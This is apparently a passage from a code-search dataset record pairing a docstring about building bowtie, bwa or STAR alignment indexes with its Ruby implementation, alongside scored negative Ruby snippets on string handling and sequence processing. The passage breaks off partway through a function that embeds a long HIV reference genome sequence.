"def lex_ignore(length)\n \n return if length.eql?0 #Si no hay nada regresa\n\n word = @input[0..length-1] # Se crea un aux de lo que se quiere ignorar\n lineas = (word + ' ').lines.to_a.length.pred #Se saca el numero de lineas, \n #convirtiendo en arreglo de las palabras separadas \\n y midiendolo\n @line += lineas\n @input = @input[length..@input.length] # Se omite la solicitado\n\n if lineas.eql?0 then\n @column += length #Se suma las columnas omitidas a las que habia\n else\n @column = 1 #Sino se colocan en 1 por salto de linea\n end\n end",
"def find_start(line, len)\n (stream,answer) = line.split(':')\n return if stream.nil?\n stream.chars.each_with_index do |c, i|\n # take slice of array starting at i\n # check if uniq.\n sub = stream[i..i+len-1]\n \n if sub.chars.uniq.length == len\n puts \"sub=#{sub}\" \n puts \"found at index=#{i} chars recv=#{i+len} answer=#{answer}\"\n return\n end\n end \nend",
"def busqueda6\n 9899.step(999999999999999999999,9899){|x|break (x) unless (p x).to_s =~ /[^0-2]/}\nend",
"def sanitize\n\t\t@message.gsub!(/[^a-zA-Z]/, \"\")\n\t\t@message.upcase!\n\n\t\tremainder = @message.length % 5\n\t\tif remainder > 0\n\t\t\t(5 - remainder).times do\t\t\t\t\n\t\t\t\t@message << \"X\"\n\t\t\tend\n\t\tend\n\n\t\t@grouped = @message.scan(/...../)\n\tend",
"def can_construct(ransom_note, magazine)\n ransom_array = ransom_note.split(\"\")\n magazine_array = magazine.split(\"\")\n\n ransom_array.each do |letter|\n if magazine_array.include?(letter) == false\n return false\n else\n magazine_array.delete_at(magazine_array.index(letter))\n end\n end\n true\nend",
"def deletion\n (0...length).map { |i|\n string.dup.tap { |str| str[i] = \"\" }\n }.uniq\n end",
"def stray (n)\n n.count(n[0]) == 1 ? n[0] : n.uniq[1]\nend",
"def right_strip(string)\n whitespaces = [\"\\n\", \"\\t\"]\n i = string.length-1\n i2 = 0\n output = \"\"\n while i>=0\n if string[i] == whitespaces[1] || string[i] == whitespaces[2]\n i-=1 \n else\n while i2<=i\n output += string[i2]\n i2+=1\n end\n return output\n end\n end\n return output\nend",
"def trim(force = T.unsafe(nil)); end",
"def trim(force = T.unsafe(nil)); end",
"def clean2\n content = text.split(\"\\n\")\n \n # First, find and mark songs\n in_song = false\n new_content = []\n content.each do |line|\n if line=~/\\*{5}/ .. line=~END_OF_SONG\n new_content << \"SONG:\" unless in_song\n if line =~ END_OF_SONG\n new_content << line\n in_song = false\n else\n new_content << \" #{line}\"\n in_song = true\n end\n else\n if in_song\n new_content << \"END OF SONG\"\n end\n in_song = false\n new_content << line\n end\n end\n \n # Now, fix line endings and merge lines\n old_content = new_content\n new_content = []\n preserve_breaks = false\n last_line = \"\"\n old_content.each do |line|\n new_content << \"\" if preserve_breaks ||\n last_line =~ END_OF_SONG || \n new_content.size == 0 ||\n line =~ /^.[LS]-\\d+(?:\\]|$|.\\s*\\()/ ||\n line =~ /^\\([A-Z]/ ||\n line =~ /^[A-Z][A-Z, \\.-]+:\\s/ ||\n line =~ /^Scene\\s+\\?\\s+-\\s+\\?/ ||\n line =~ START_OF_SONG ||\n line =~ /^#/\n case line\n when START_OF_SONG\n preserve_breaks = true\n when END_OF_SONG\n preserve_breaks = false\n end\n new_content[-1] += ' ' unless new_content[-1] =~ /^$|\\s$/\n new_content[-1] += line\n last_line = line\n end\n \n # Now, insert extra empty lines\n old_content = new_content\n new_content = []\n extra_space = true\n in_cast = false\n in_song = false\n \n old_content.each do |line|\n if line =~ /^#/\n extra_space = false if in_cast\n else\n in_cast = false\n extra_space = true unless in_song\n end\n new_content << \"\" if extra_space && new_content.size > 0\n new_content << line\n case line\n when /^#CAST FOR SCENE/\n in_cast = true\n when START_OF_SONG\n extra_space = false\n in_song = true\n when END_OF_SONG\n extra_space = true\n in_song = false\n end\n end\n \n # Finally, fix songs\n old_content = new_content\n new_content = []\n i = 0\n while i<old_content.size\n line = old_content[i]\n case line\n when START_OF_SONG\n # Find lines with stars in them\n j = i+1\n while j<old_content.size && old_content[j] !~ END_OF_SONG\n j += 1\n end\n # At this point lines i...j are the song; back up and look for the last \"*****\"\n while j>i && old_content[j] !~ /\\*{5}/\n j -= 1\n end\n # Now lines (i+1)...j are the song information block\n song_information = old_content[(i+1)...j].join\n song_name = song_information[/^[\\s\\*]*([^\\*]+)/,1].strip\n tune = song_information[/([^\\*]+)[\\s\\*]*$/,1].strip\n new_content += [\" SONG: #{song_name}\", \" (To the tune of: #{tune})\"]\n i = j+1\n when END_OF_SONG\n i += 1 # Discard end of song markers; we don't need them anymore\n else\n new_content << line\n i += 1\n end\n end\n \n # Save the results\n text = new_content.join(\"\\n\")\n end",
"def remove_bird_tracks(line)\n tracks = line.scan(BIRD_TRACKS_REGEX)[0]\n (tracks.first == \" \") ? tracks[1] : tracks.join\n end",
"def muscle_sequence(ref_seq = \"\", test_seq = \"\", temp_dir=File.dirname($0))\n temp_file = temp_dir + \"/temp\"\n temp_aln = temp_dir + \"/temp_aln\"\n name = \">test\"\n temp_in = File.open(temp_file,\"w\")\n temp_in.puts \">ref\"\n temp_in.puts ref_seq\n temp_in.puts name\n temp_in.puts test_seq\n temp_in.close\n print `muscle -in #{temp_file} -out #{temp_aln} -quiet`\n aln_seq = fasta_to_hash(temp_aln)[\">test\"]\n File.unlink(temp_file)\n File.unlink(temp_aln)\n return aln_seq\nend",
"def pop(n)\n @buffer.rewind\n @buffer.read(n) || \"\"\n end",
"def get_sandwich(str)\n new_str = \"\"\n (str.size - 4).times do |ingred|\n slice = str[ingred..(ingred + 4)]\n if slice == \"bread\"\n new_str = str[str.index(slice) + 5..str.rindex(slice) - 1]\n end\n end\n return new_str\nend",
"def remove(input, string); end",
"def three_prime_utr_seq\n return self.seq[self.coding_region_cdna_end..-1]\n end",
"def romaji_conditional_slice(string)\n if part_of_speech == \"v5u\" || part_of_speech == \"v5u-s\"\n string.slice!(-1)\n else\n string.slice!(-2..-1)\n end\n end",
"def array_to_unique\n a = File.readline(\"./tmp/database_doings/doing_phrases/phrases_to_sort.txt\")\n b = a.sort\n c = b.uniq\n while d = c.shift\n puts d unless nil?\n end\n end",
"def all_else_dna(dna)\n # Input: A\n # Output: C G T\n # Input: C\n # Output: A G T\n dna_a = [\"A\", \"C\", \"G\", \"T\"]\n # puts dna_a.join(\" \")\n dna_a.delete(dna)\n # puts dna_a.join(\" \")\n return dna_a\n end",
"def read_auto_clean_up=(_arg0); end",
"def writeFinalSequenceFrag()\n outFile = File.new(@seqNameRead1, \"w\")\n\n @read1FileList.each do |file|\n reader = Zlib::GzipReader.open(file)\n while(line = reader.gets)\n line.strip!\n\n if line.match(/^@/)\n @numReadsRead1 = @numReadsRead1 + 1\n\n # Read next 3 lines to complete reading 1 Fastq record\n readString = reader.gets.strip\n qualHeader = reader.gets.strip\n qualString = reader.gets.strip\n\n if line.match(/\\s\\d:N:/)\n @numFilteredRead1 = @numFilteredRead1 + 1\n writeFastqRecordToFile(outFile, line, readString, qualHeader,\n qualString)\n end\n end\n end\n reader.close\n end\n outFile.close\n end"
] |
[
"0.5708526",
"0.5702116",
"0.5659281",
"0.5645462",
"0.55234194",
"0.5460344",
"0.5375854",
"0.5361511",
"0.5352391",
"0.53510356",
"0.5338272",
"0.532415",
"0.5315767",
"0.52379984",
"0.5136319",
"0.51339257",
"0.5115226",
"0.5104202",
"0.5103664",
"0.50995904",
"0.5087479",
"0.50766516",
"0.50706214",
"0.50700915",
"0.5055571",
"0.5036293",
"0.50079364",
"0.4988541",
"0.49761784",
"0.4964564",
"0.49607977",
"0.49570033",
"0.49508336",
"0.49451256",
"0.49390727",
"0.4935523",
"0.49324852",
"0.49286935",
"0.49255425",
"0.49176657",
"0.49153042",
"0.49104527",
"0.49087095",
"0.49023977",
"0.48929822",
"0.4886947",
"0.4877518",
"0.48751876",
"0.48679775",
"0.4865893",
"0.48624623",
"0.48593727",
"0.48550287",
"0.4849572",
"0.48464456",
"0.4832795",
"0.48317087",
"0.48282102",
"0.48178962",
"0.4803738",
"0.4799703",
"0.4799689",
"0.47937766",
"0.47912234",
"0.47890761",
"0.47881",
"0.47622025",
"0.47587544",
"0.47561926",
"0.47549495",
"0.47524852",
"0.4749596",
"0.474944",
"0.47406498",
"0.4737675",
"0.47343436",
"0.47325084",
"0.47313955",
"0.47268695",
"0.47240308",
"0.47204497",
"0.47124556",
"0.47082633",
"0.47023928",
"0.46808374",
"0.4680809",
"0.4677541",
"0.4677541",
"0.46772552",
"0.46756813",
"0.4674242",
"0.46684307",
"0.4665104",
"0.46646854",
"0.46642634",
"0.46594638",
"0.46557322",
"0.46554413",
"0.4649268",
"0.46486166"
] |
0.54237974
|
6
|
PreComputes index if it does not exist ref path to reference ref_base path to reference without file extension software alignment software (bowtie1, bowtie2, bwa, star) annotation path to GTF annotation (only star) Returns nothing
|
def index(ref, ref_base, software, annotation = '')
index_suffix = {
bowtie1: '4.ebwt',
bowtie2: '4.bt2',
bwa: '.sa',
star: '.star'
}
index_cmd = {
bowtie1: "bowtie-build -p #{ref} #{ref_base}",
bowtie2: "bowtie2-build -p #{ref} #{ref_base}",
bwa: "bwa index #{ref}",
star: "mkdir #{ref_base} && "\
'STAR --runMode genomeGenerate' \
' --runThreadN $(nproc)' \
" --genomeDir #{ref_base}"\
" --genomeFastaFiles #{ref}"\
' --sjdbOverhang 49' \
" --sjdbGTFfile #{annotation} "
}
time = 5
while File.exist?("#{ref_base}.lock")
print_e "#{ref_base}.lock exists. Wait for #{time} seconds."
sleep(time)
time *= 5
end
return if software == :tophat ||
skip_step?("#{ref_base}.#{index_suffix[software]}", 'indexing')
begin
run_cmd("touch #{ref_base}.lock")
run_cmd(index_cmd[software])
ensure
run_cmd("rm -f #{ref_base}.lock")
end
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def compute\n index(@ref, @ref_base, @software, @annotation)\n\n if @err_rate > 0\n bucketized_alignment\n else # software == :star || err_rate == 0\n unbucketized_alignment\n end\n end",
"def initialize(annot)\n @annot = annot\n @id2name = {}\n @index = \"#{@annot}.name_index\"\n if File.exist?(@index)\n read_index\n else\n build_index\n end\n end",
"def map_tgup_by_proteinid()\n # output unmatch list for map by gene_id (prefix of gene_id is first char of gene_id. (\"1\", \"2\", ..))\n refg_output = {}\n FileUtils.mkdir_p(\"#{$prepare_dir}/refg\") unless File.exist?(\"#{$prepare_dir}/refg\")\n (1..9).each do |prefix|\n refg_output[prefix.to_s] = File.open(\"#{$prepare_dir}/refg/#{prefix.to_s}.dat\", \"w\")\n end\n\n output_header\n\n # try mapping the same prefix of RefSeq data and UniProt data(for performance)\n Dir.glob(\"#{$prepare_dir}/refp/*.dat\") do |input_file|\n # parse data\n refseq_gene_list = []\n protein_id_prefix = input_file.split(\"/\").last.split(\"\\.\").first\n puts \"protein_id prefix: #{protein_id_prefix}\"\n File.open(input_file) do |f|\n f.each_line do |line|\n columns = line.chomp.strip.split(\"\\t\")\n gene_id_prefix = columns[4].nil? ? \"\" : columns[4][0]\n refseq_gene_list.push({taxid: columns[0], gene_rsrc: columns[1], gene_label: columns[2], protein_id: columns[3], gene_id: columns[4], gene_id_prefix: gene_id_prefix})\n end\n end\n\n $count_nc += refseq_gene_list.size if protein_id_prefix == \"no_protein_id\" # no protein_id on RefSeq\n up_list = load_up_refp(protein_id_prefix) # get same prefix data from UniProt\n\n refseq_gene_list.each do |refseq_data|\n match = false\n output_tax(refseq_data) # output all gene-tax turtle\n unless up_list.nil? # exist prefix on UniProt\n match_list = up_list[refseq_data[:protein_id]]\n unless match_list.nil? # match some uniprot_ids\n match_list.each do |up_info|\n if refseq_data[:taxid] == up_info[:taxid] # ignore unmatch tax\n output_idmap(refseq_data, up_info[:upid])\n match = true\n else # match protein_id but not match tax_id\n output_uptax(up_info)\n $taxup_list[up_info[:taxid]] = true\n $tax_mismatch[\"#{refseq_data[:taxid]}-#{up_info[:taxid]} : #{refseq_data[:protein_id]}\"] = true\n end\n end\n end\n end\n if match == false\n if refseq_data[:gene_id_prefix].nil? ||refseq_data[:gene_id_prefix] == \"\" # can't salvage it by gene_id.\n $no_up += 1\n else # output a file to each prefix of gene_id that can be salvaged by gene_id\n line = [refseq_data[:taxid], refseq_data[:gene_rsrc], refseq_data[:gene_label], refseq_data[:protein_id], refseq_data[:gene_id], refseq_data[:gene_id_prefix]]\n refg_output[refseq_data[:gene_id_prefix]].puts(line.join(\"\\t\"))\n end\n end\n $count += 1\n end\n end\n refg_output.each do |k, v|\n v.flush\n v.close\n end\nend",
"def initialize(matching_index, pointer)\n # Matching files with other indexes than CRC\n # map< ( file_info | segment_info ), matching_pointer_info >\n # map< ( FileInfo | SegmentInfo ), MatchingIndexSinglePointer >\n @matching_files = {}\n @crc_matching_files = {}\n @score_max = compute_score_max(pointer)\n # First find CRC matching files\n if (matching_index.indexes.has_key?(:crc))\n matching_index.indexes[:crc].each do |data, lst_pointers|\n @crc_matching_files.concat(lst_pointers)\n end\n end\n # Then all other indexes\n matching_index.indexes.each do |index_name, index_data|\n if (index_name != :crc)\n index_data.each do |data, lst_pointers|\n lst_pointers.each do |matching_pointer|\n if (!@crc_matching_files.has_key?(matching_pointer))\n @matching_files[matching_pointer] = MatchingIndexSinglePointer.new if (!@matching_files.has_key?(matching_pointer))\n @matching_files[matching_pointer].score += COEFFS[index_name]\n @matching_files[matching_pointer].indexes[index_name] = [] if (!@matching_files[matching_pointer].indexes.has_key?(index_name))\n @matching_files[matching_pointer].indexes[index_name] << data\n end\n end\n end\n end\n end\n matching_index.segments_metadata.each do |segment_ext, segment_ext_data|\n segment_ext_data.each do |metadata_key, metadata_data|\n metadata_data.each do |metadata_value, lst_pointers|\n lst_pointers.each do |matching_pointer|\n if (!@crc_matching_files.has_key?(matching_pointer))\n @matching_files[matching_pointer] = MatchingIndexSinglePointer.new if (!@matching_files.has_key?(matching_pointer))\n @matching_files[matching_pointer].score += COEFF_SEGMENT_METADATA\n @matching_files[matching_pointer].segments_metadata[segment_ext] = {} if (!@matching_files[matching_pointer].segments_metadata.has_key?(segment_ext))\n @matching_files[matching_pointer].segments_metadata[segment_ext][metadata_key] = [] if (!@matching_files[matching_pointer].segments_metadata[segment_ext].has_key?(metadata_key))\n @matching_files[matching_pointer].segments_metadata[segment_ext][metadata_key] << metadata_value\n end\n end\n end\n end\n end\n # Find matching blocks' CRC sequences\n lst_crc = (pointer.is_a?(FileInfo) ? pointer.crc_list : pointer.segment.crc_list)\n @matching_files.each do |matching_pointer, matching_info|\n if (matching_info.indexes.has_key?(:block_crc))\n lst_common_crc = matching_info.indexes[:block_crc]\n # Get the list of blocks' CRC from the file\n lst_matching_crc = (matching_pointer.is_a?(FileInfo) ? matching_pointer.crc_list : matching_pointer.segment.crc_list)\n # Parse the original file and get to a matching CRC\n idx_crc = 0\n while (idx_crc < lst_crc.size)\n while ((idx_crc < lst_crc.size) and\n (!lst_common_crc.include?(lst_crc[idx_crc])))\n idx_crc += 1\n end\n if (idx_crc < lst_crc.size)\n first_crc = lst_crc[idx_crc]\n # We are at the beginning of a sequence in the original file.\n smallest_sequence_size = lst_crc.size - idx_crc\n # Find all the occurences of this sequence in the matching file.\n lst_matching_crc.each_with_index do |matching_crc, idx_matching_crc|\n if (matching_crc == first_crc)\n # We are at the beginning of a sequence in the matching file\n idx_sequence = 1\n # Get the matching sequence\n matching_sequence = [first_crc]\n while ((idx_crc+idx_sequence < lst_crc.size) and\n (idx_matching_crc+idx_sequence < lst_matching_crc.size) and\n (lst_crc[idx_crc+idx_sequence] == lst_matching_crc[idx_matching_crc+idx_sequence]))\n matching_sequence << lst_crc[idx_crc+idx_sequence]\n idx_sequence += 1\n end\n if (matching_sequence.size > 1)\n # There is a matching sequence\n offset = idx_crc*FileInfo::CRC_BLOCK_SIZE\n matching_info.block_crc_sequences[offset] = {} if (!matching_info.block_crc_sequences.has_key?(offset))\n matching_info.block_crc_sequences[offset][idx_matching_crc*FileInfo::CRC_BLOCK_SIZE] = matching_sequence\n smallest_sequence_size = matching_sequence.size if (matching_sequence.size < smallest_sequence_size)\n # For each successful sequence, increase the score\n matching_info.score += (COEFF_BLOCK_CRC_SEQUENCE * matching_sequence.size)\n end\n end\n end\n idx_crc += smallest_sequence_size\n end\n end\n end\n end\n end",
"def idx_log_file\n\t\t\"#{pre}/genome_idx/log\" #Bowtie2 Index Log\n\tend",
"def croucher_index_file\n nil\n end",
"def require_reference(path); end",
"def fa_file\n\t\t\"#{pre}/genome.fa\" #Genome fasta location\n\tend",
"def bam_index_load(fn)\n hts_idx_load(fn, HTS_FMT_BAI)\n end",
"def require_index(name); end",
"def require_index(name); end",
"def get_index_from_gh # rubocop:disable Metrics/MethodLength, Metrics/AbcSize\n resp = Zip::InputStream.new URI(\"#{Hit::GHURL}index.zip\").open\n zip = resp.get_next_entry\n yaml = zip.get_input_stream.read\n index = RelatonBib.parse_yaml yaml, [Symbol]\n File.write path, index.to_yaml, encoding: \"UTF-8\"\n index\n end",
"def index(options = {})\n system(\"gem generate_index -d #{@path} > /dev/null\")\n # options = {:build_legacy => true, :build_modern => true}.merge(options)\n # indexer = indexer(options)\n # options[:update] ? indexer.update_index : indexer.generate_index\n end",
"def map_tgup_by_geneid()\n Dir.glob(\"#{$prepare_dir}/refg/*.dat\") do |input_file|\n refseq_gene_list = []\n gene_id_prefix = input_file.split(\"/\").last.split(\"\\.\").first\n puts \"gene_id prefix: #{gene_id_prefix}\"\n File.open(input_file) do |f|\n f.each_line do |line|\n columns = line.chomp.strip.split(\"\\t\")\n refseq_gene_list.push({taxid: columns[0], gene_rsrc: columns[1], gene_label: columns[2], protein_id: columns[3], gene_id: columns[4], gene_id_prefix: gene_id_prefix})\n end\n end\n\n up_list = load_up_refg(gene_id_prefix) # get same prefix data from UniProt\n refseq_gene_list.each do |refseq_data|\n match = false\n unless up_list.nil? # exist prefix list on UniProt\n match_list = up_list[refseq_data[:gene_id]]\n unless match_list.nil?\n match_list.each do |up_info|\n if refseq_data[:taxid] == up_info[:taxid]\n output_idmap(refseq_data, up_info[:upid])\n match = true\n end\n end\n end\n end\n if match == false\n $no_up += 1\n end\n end\n end\nend",
"def make_augmenting_path!()\n # Construct alternating paths\n complete = false\n count = 0\n \n while !complete\n row = @annotated_matrix.find_in_col(@image[count], STARRED).first\n \n if row\n count += 1\n @preimage[count] = row\n @image[count] = @image[count-1]\n else\n complete = true\n end\n\n if !complete\n col = @annotated_matrix.find_in_row(@preimage[count], PRIMED).first\n count += 1\n @preimage[count] = @preimage[count-1]\n @image[count] = col\n end\n end\n\n # Modify the paths\n (count+1).times {|i|\n row = @preimage[i]\n col = @image[i]\n \n if starred?(row, col)\n unstar!(row, col)\n else\n star!(row, col)\n end\n }\n clear_covers!()\n clear_primes!()\n return 3\n end",
"def masterfile_keys\n ['gtin', 'tranno']\n end",
"def NL43_locator(seq=\"\",temp_dir=File.dirname($0))\n hxb2_ref = \"TGGAAGGGCTAATTTGGTCCCAAAAAAGACAAGAGATCCTTGATCTGTGGATCTACCACACACAAGGCTACTTCCCTGATTGGCAGAACTACACACCAGGGCCAGGGATCAGATATCCACTGACCTTTGGATGGTGCTTCAAGTTAGTACCAGTTGAACCAGAGCAAGTAGAAGAGGCCAAATAAGGAGAGAAGAACAGCTTGTTACACCCTATGAGCCAGCATGGGATGGAGGACCCGGAGGGAGAAGTATTAGTGTGGAAGTTTGACAGCCTCCTAGCATTTCGTCACATGGCCCGAGAGCTGCATCCGGAGTACTACAAAGACTGCTGACATCGAGCTTTCTACAAGGGACTTTCCGCTGGGGACTTTCCAGGGAGGTGTGGCCTGGGCGGGACTGGGGAGTGGCGAGCCCTCAGATGCTACATATAAGCAGCTGCTTTTTGCCTGTACTGGGTCTCTCTGGTTAGACCAGATCTGAGCCTGGGAGCTCTCTGGCTAACTAGGGAACCCACTGCTTAAGCCTCAATAAAGCTTGCCTTGAGTGCTCAAAGTAGTGTGTGCCCGTCTGTTGTGTGACTCTGGTAACTAGAGATCCCTCAGACCCTTTTAGTCAGTGTGGAAAATCTCTAGCAGTGGCGCCCGAACAGGGACTTGAAAGCGAAAGTAAAGCCAGAGGAGATCTCTCGACGCAGGACTCGGCTTGCTGAAGCGCGCACGGCAAGAGGCGAGGGGCGGCGACTGGTGAGTACGCCAAAAATTTTGACTAGCGGAGGCTAGAAGGAGAGAGATGGGTGCGAGAGCGTCGGTATTAAGCGGGGGAGAATTAGATAAATGGGAAAAAATTCGGTTAAGGCCAGGGGGAAAGAAACAATATAAACTAAAACATATAGTATGGGCAAGCAGGGAGCTAGAACGATTCGCAGTTAATCCTGGCCTTTTAGAGACATCAGAAGGCTGTAGACAAATACTGGGACAGCTACAACCATCCCTTCAGACAGGATCAGAAGAACTTAGATCATTATATAATACAATAGCAGTCCTCTATTGTGTGCATCAAAGGATAGATGTAAAAGACACCAAGGAAGCCTTAGATAAGATAGAGGAAGAGCAAAACAAAAGTAAGAAAAAGGCACAGCAAGCAGCAGCTGACACAGGAAACAACAGCCAGGTCAGCCAAAATTACCCTATAGTGCAGAACCTCCAGGGGCAAATGGTACATCAGGCCATATCACCTAGAACTTTAAATGCATGGGTAAAAGTAGTAGAAGAGAAGGCTTTCAGCCCAGAAGTAATACCCATGTTTTCAGCATTATCAGAAGGAGCCACCCCACAAGATTTAAATACCATGCTAAACACAGTGGGGGGACATCAAGCAGCCATGCAAATGTTAAAAGAGACCATCAATGAGGAAGCTGCAGAATGGGATAGATTGCATCCAGTGCATGCAGGGCCTATTGCACCAGGCCAGATGAGAGAACCAAGGGGAAGTGACATAGCAGGAACTACTAGTACCCTTCAGGAACAAATAGGATGGATGACACATAATCCACCTATCCCAGTAGGAGAAATCTATAAAAGATGGATAATCCTGGGATTAAATAAAATAGTAAGAATGTATAGCCCTACCAGCATTCTGGACATAAGACAAGGACCAAAGGAACCCTTTAGAGACTATGTAGACCGATTCTATAAAACTCTAAGAGCCGAGCAAGCTTCACAAGAGGTAAAAAATTGGATGACAGAAACCTTGTTGGTCCAAAATGCGAACCCAGATTGTAAGACTATTTTAAAAGCATTGGGACCAGGAGCGACACTAGAAGAAATGATGACAGCATGTCAGGGAGTGGGGGGACCCGGCCATAAAGCAAGAGTTTTGGCTGAAGCAATGAGCCAAGTAACAAATCCAGCTACCATAATGATACAGAAAGGCAATTTTAGGAACCAAAGAAAGACTGTTAAGTGTTTCAATTGTGGCAAAGAAGGGCACATAGCCAAAAATTGCAGGGCCCCTAGGAAAAAGGGCTGTTGGAAATGTGGAAAGGAAGGACACCAAATGAAAGATTGTACTGAGAGACAGGCTAATTTTTTAGGGAAGATCTGGCCTTCCCACAAGGGAAGGCCAGGGAATTTTCTTCAGAGCAGACCAGAGCCAACAGCCCCACCAGAAGAGAGCTTCAGGTTTGGGGAAGAGACAACAACTCCCTCTCAGAAGCAGGAGCCGATAGACAAGGAACTGTATCCTTTAGCTTCCCTCAGATCACTCTTTGGCAGCGACCCCTCGTCACAATAAAGATAGGGGGGCAATTAAAGGAAGCTCTATTAGATACAGGAGCAGATGATACAGTATTAGAAGAAATGAATTTGCCAGGAAGATGGAAACCAAAAATGATAGGGGGAATTGGAGGTTTTATCAAAGTAAGACAGTATGATCAGATACTCATAGAAATCTGCGGACATAAAGCTATAGGTACAGTATTAGTAGGACCTACACCTGTCAACATAATTGGAAGAAATCTGTTGACTCAGATTGGCTGCACTTTAAATTTTCCCATTAGTCCTATTGAGACTGTACCAGTAAAATTAAAGCCAGGAATGGATGGCCCAAAAGTTAAACAATGGCCATTGACAGAAGAAAAAATAAAAGCATTAGTAGAAATTTGTACAGAAATGGAAAAGGAAGGAAAAATTTCAAAAATTGGGCCTGAAAATCCATACAATACTCCAGTATTTGCCATAAAGAAAAAAGACAGTACTAAATGGAGAAAATTAGTAGATTTCAGAGAACTTAATAAGAGAACTCAAGATTTCTGGGAAGTTCAATTAGGAATACCACATCCTGCAGGGTTAAAACAGAAAAAATCAGTAACAGTACTGGATGTGGGCGATGCATATTTTTCAGTTCCCTTAGATAAAGACTTCAGGAAGTATACTGCATTTACCATACCTAGTATAAACAATGAGACACCAGGGATTAGATATCAGTACAATGTGCTTCCACAGGGATGGAAAGGATCACCAGCAATATTCCAGTGTAGCATGACAAAAATCTTAGAGCCTTTTAGAAAACAAAATCCAGACATAGTCATCTATCAATACATGGATGATTTGTATGTAGGATCTGACTTAGAAATAGGGCAGCATAGAACAAAAATAGAGGAACTGAGACAACATCTGTTGAGGTGGGGATTTACCACACCAGACAAAAAACATCAGAAAGAACCTCCATTCCTTTGGATGGGTTATGAACTCCATCCTGATAAATGGACAGTACAGCCTATAGTGCTGCCAGAAAAGGACAGCTGGACTGTCAATGACATACAGAAATTAGTGGGAAAATTGAATTGGGCAAGTCAGATTTATGCAGGGATTAAAGTAAGGCAATTATGTAAACTTCTTAGGGGAACCAAAGCACTAACAGAAGTAGTACCACTAACAGAAGAAGCAGAGCTAGAACTGGCAGAAAACAGGGAGATTCTAAAAGAACCGGTACATGGAGTGTATTATGACCCATCAAAAGACTTAATAGCAGAAATACAGAAGCAGGGGCAAGGCCAATGGACATATCAAATTTATCAAGAGCCATTTAAAAATCTGAAAACAGGAAAATATGCAAGAATGAAGGGTGCCCACACTAATGATGTGAAACAATTAACAGAGGCAGTACAAAAAATAGCCACAGAAAGCATAGTAATATGGGGAAAGACTCCTAAATTTAAATTACCCATACAAAAGGAAACATGGGAAGCATGGTGGACAGAGTATTGGCAAGCCACCTGGATTCCTGAGTGGGAGTTTGTCAATACCCCTCCCTTAGTGAAGTTATGGTACCAGTTAGAGAAAGAACCCATAATAGGAGCAGAAACTTTCTATGTAGATGGGGCAGCCAATAGGGAAACTAAATTAGGAAAAGCAGGATATGTAACTGACAGAGGAAGACAAAAAGTTGTCCCCCTAACGGACACAACAAATCAGAAGACTGAGTTACAAGCAATTCATCTAGCTTTGCAGGATTCGGGATTAGAAGTAAACATAGTGACAGACTCACAATATGCATTGGGAATCATTCAAGCACAACCAGATAAGAGTGAATCAGAGTTAGTCAGTCAAATAATAGAGCAGTTAATAAAAAAGGAAAAAGTCTACCTGGCATGGGTACCAGCACACAAAGGAATTGGAGGAAATGAACAAGTAGATGGGTTGGTCAGTGCTGGAATCAGGAAAGTACTATTTTTAGATGGAATAGATAAGGCCCAAGAAGAACATGAGAAATATCACAGTAATTGGAGAGCAATGGCTAGTGATTTTAACCTACCACCTGTAGTAGCAAAAGAAATAGTAGCCAGCTGTGATAAATGTCAGCTAAAAGGGGAAGCCATGCATGGACAAGTAGACTGTAGCCCAGGAATATGGCAGCTAGATTGTACACATTTAGAAGGAAAAGTTATCTTGGTAGCAGTTCATGTAGCCAGTGGATATATAGAAGCAGAAGTAATTCCAGCAGAGACAGGGCAAGAAACAGCATACTTCCTCTTAAAATTAGCAGGAAGATGGCCAGTAAAAACAGTACATACAGACAATGGCAGCAATTTCACCAGTACTACAGTTAAGGCCGCCTGTTGGTGGGCGGGGATCAAGCAGGAATTTGGCATTCCCTACAATCCCCAAAGTCAAGGAGTAATAGAATCTATGAATAAAGAATTAAAGAAAATTATAGGACAGGTAAGAGATCAGGCTGAACATCTTAAGACAGCAGTACAAATGGCAGTATTCATCCACAATTTTAAAAGAAAAGGGGGGATTGGGGGGTACAGTGCAGGGGAAAGAATAGTAGACATAATAGCAACAGACATACAAACTAAAGAATTACAAAAACAAATTACAAAAATTCAAAATTTTCGGGTTTATTACAGGGACAGCAGAGATCCAGTTTGGAAAGGACCAGCAAAGCTCCTCTGGAAAGGTGAAGGGGCAGTAGTAATACAAGATAATAGTGACATAAAAGTAGTGCCAAGAAGAAAAGCAAAGATCATCAGGGATTATGGAAAACAGATGGCAGGTGATGATTGTGTGGCAAGTAGACAGGATGAGGATTAACACATGGAAAAGATTAGTAAAACACCATATGTATATTTCAAGGAAAGCTAAGGACTGGTTTTATAGACATCACTATGAAAGTACTAATCCAAAAATAAGTTCAGAAGTACACATCCCACTAGGGGATGCTAAATTAGTAATAACAACATATTGGGGTCTGCATACAGGAGAAAGAGACTGGCATTTGGGTCAGGGAGTCTCCATAGAATGGAGGAAAAAGAGATATAGCACACAAGTAGACCCTGACCTAGCAGACCAACTAATTCATCTGCACTATTTTGATTGTTTTTCAGAATCTGCTATAAGAAATACCATATTAGGACGTATAGTTAGTCCTAGGTGTGAATATCAAGCAGGACATAACAAGGTAGGATCTCTACAGTACTTGGCACTAGCAGCATTAATAAAACCAAAACAGATAAAGCCACCTTTGCCTAGTGTTAGGAAACTGACAGAGGACAGATGGAACAAGCCCCAGAAGACCAAGGGCCACAGAGGGAGCCATACAATGAATGGACACTAGAGCTTTTAGAGGAACTTAAGAGTGAAGCTGTTAGACATTTTCCTAGGATATGGCTCCATAACTTAGGACAACATATCTATGAAACTTACGGGGATACTTGGGCAGGAGTGGAAGCCATAATAAGAATTCTGCAACAACTGCTGTTTATCCATTTCAGAATTGGGTGTCGACATAGCAGAATAGGCGTTACTCGACAGAGGAGAGCAAGAAATGGAGCCAGTAGATCCTAGACTAGAGCCCTGGAAGCATCCAGGAAGTCAGCCTAAAACTGCTTGTACCAATTGCTATTGTAAAAAGTGTTGCTTTCATTGCCAAGTTTGTTTCATGACAAAAGCCTTAGGCATCTCCTATGGCAGGAAGAAGCGGAGACAGCGACGAAGAGCTCATCAGAACAGTCAGACTCATCAAGCTTCTCTATCAAAGCAGTAAGTAGTACATGTAATGCAACCTATAATAGTAGCAATAGTAGCATTAGTAGTAGCAATAATAATAGCAATAGTTGTGTGGTCCATAGTAATCATAGAATATAGGAAAATATTAAGACAAAGAAAAATAGACAGGTTAATTGATAGACTAATAGAAAGAGCAGAAGACAGTGGCAATGAGAGTGAAGGAGAAGTATCAGCACTTGTGGAGATGGGGGTGGAAATGGGGCACCATGCTCCTTGGGATATTGAT